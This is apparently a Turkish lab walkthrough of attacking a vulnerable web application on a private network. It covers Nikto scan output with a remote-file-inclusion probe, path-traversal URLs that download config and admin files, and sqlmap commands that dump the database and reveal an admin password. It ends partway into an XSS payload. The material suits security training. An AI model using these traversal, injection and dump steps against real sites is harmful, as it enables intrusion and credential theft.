+ GET Uncommon header 'content-disposition' found, with contents: filename="downloads"
+ GET /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3268: GET /admin/: Directory indexing found.
+ OSVDB-3092: GET /admin/: This might be interesting...
+ OSVDB-3268: GET /downloads/: Directory indexing found.
+ OSVDB-3092: GET /downloads/: This might be interesting...
+ GET Server leaks inodes via ETags, header found with file /manual/, fields: 0x2304 0x51b0c59e09040
+ OSVDB-3092: GET /manual/: Web server manual found.
+ GET /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: GET /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: GET /icons/: Directory indexing found.
+ OSVDB-3268: GET /manual/images/: Directory indexing found.
+ OSVDB-3268: GET /images/: Directory indexing found.
+ OSVDB-3268: GET /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ OSVDB-3233: GET /icons/README: Apache default file found.
+ GET Cookie lang created without the httponly flag
+ GET /info.php?file=http://cirt.net/rfiinc.txt?: Output from the phpinfo() function was found.
+ OSVDB-5292: GET /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/

Bu sonuçlara göre bir baştan gidelim isterseniz.

/admin/ şeklinde bir path girdiğimizde içeride ki dosyaları görebiliyoruz.

İsterseniz LFI açığı sayesinde bu dosyaları indirebilirsiniz. Aşağıda rastgele olarak girilmiş indirilmiş olan iki adet dosya örneği vardır.

http://192.168.1.55/download.php?item=../admin/admincontent.php

http://192.168.1.55/download.php?item=../config.php

Nikto sonuçlarına göre phpinfo yu da

http://192.168.1.55/info.php

‘ dan okuyabiliyoruz.

Nikto sonuçlarını daha sonra değerlendirmek için bir kenara bırakıyoruz ve bir diğer çok kullanılan program olan Burp Suite programımızı başlatıyoruz.

Iceweasel ile ayarlarımızı yaptıktan sonra intercept imiz açık bir şekilde siteye istek gönderiyoruz ve yakalanan veriyi spider’a atıyoruz. Target kısmında ise spider ımızın yaptığı işi görüyorsunuz.

Burada ki sonuca göre GET ile çekilen bazı sayfaları denemek gerekebilir.

Rastgele bir sayfa seçerek burp suite ile araya girelim.

Burada action’a tıklayarak bunu repeater a gönderdim burada bazı denemelerimiz olacak.

Aşağıda ki resimde bir çok deneme yaptım type kısmında false-positive aradım fakat bulamadım bende prod=1 argümanında aramaya karar verdim ve burada db’yi hata vermeye zorladım. Bu gibi durumlarda SQLi olabileceğinden şüphelenebiliriz.

SQLi olduğunu düşündüğüm için yine kali üzerinde bulunan sqlmap yazılımını kullanacağım.

Kullandığım parametreler =

sqlmap -u "192.168.1.42/details.php?prod=1&type=1" --dbms MySQL --level 3 --risk 3 --dbs

sqlmap -u "192.168.1.42/details.php?prod=1&type=1" -p prod --dbms MySQL --level 3 --risk 3 --dbs

Burada ki komutları kısaca açıklarsak;
dbms: Database Management System, Database sistemini seçiyoruz bu MySQL olabilir MSSQL olabilir tamamen siteye bağlıdır. İlk sql injection dediğimizde bize mysql çıktısını vermişti o yüzden Mysql seçtik.
–level: Burada bazı sistemlerde bulunan filtreleme metodları vardır bunları atlatabilmek için (eğer varsa) böyle bir komut giriyoruz. Level ve risk gibi parametreleri belirtmezisek not injectable olarak çıktı gönderebilir.

–dbs: Database i enumerate ( türkçe olarak saymak/dökmek kullanabiliriz sanırım ) etmek için kullanıyoruz.
-p ise verdiğimiz url de hangi parametreye bu atakları yapacağını belirtmemizi sağlıyor.

Diğer komutlar için

sqlmap --help | grep "\--dbs" #Örnek

şeklinde komutlara bakabilirsiniz. Burada gönderdiğimiz komutlar ile get metodu olduğu unutulmasın eğer post metodu kullanılsaydı –data şeklinde bir kullanımımız olacaktı.

Şimdilik burada bir şey bulamadık siteyi biraz daha gezelim.

Not: Eğer bu kısımda bir zafiyet var ise aşağıya yorum olarak belirtirseniz hem ben hemde yazıyı okuyabilecek kişiler faydalanmış olur.

Artık 2-3 tool’un genel anlamıyla nasıl kullanıldığını da anlatmış olduk o yüzden sonuç odaklı gideceğim.

Burada yapılan isteği raw olarak kaydettik. Sağ tık save item dediğinizde nereye kaydetmek isteyeceğinizi soracaktır.

Bu kaydettiğimiz dosyayı sqlmap ile otomatize edeceğiz.

sqlmap -r deneme --dbs

Gördüğünüz gibi bize db isimlerini çekti.

Bizim istediğimiz bilgiler olasılıkla seattle db’inde olacaktır.

Şimdi

sqlmap -r deneme --dbs -D seattle --tables

-D kısmıyla db ‘ mizi seçtik ve tables ile tabloları istediğimizi belirttik.

sqlmap -r deneme --dbs -D seattle --columns

Eğer adım adım gitmek isterseniz bu şekilde gidebilirsiniz ama ben direk dump olarak almak istedim o yüzden

sqlmap -r deneme --dbs -D seattle --dump-all

yukarıda ki komutu girdim ve artık admin parolamız elimizde.

Çıktımız :

Kullanıcı adı: [email protected]

Parola: Assasin1

Şimdi birde blog kısmına bakalım burada admin bloglarına tıkladığımızda

blog.php?author=admin gibi bir get ibaresi görüyoruz ve aşağıda da admin yazıyor.(SQL inj denemeleri yapsam da bir sonuç alamadım.)

Buradan xss almaya çalışalım.

Burada html kodlarına baktığımızda yazdığımız ibarenin

olduğunu görüyoruz.

bizimibaremiz

Öncelikle bizim tırnak içinden ‘ ” ‘ ile çıkmamız daha sonra da span tagını kapatmamız gerekiyor.

Bunun içinde ben! ( Siz daha farklı yapabilirsiniz )

"\>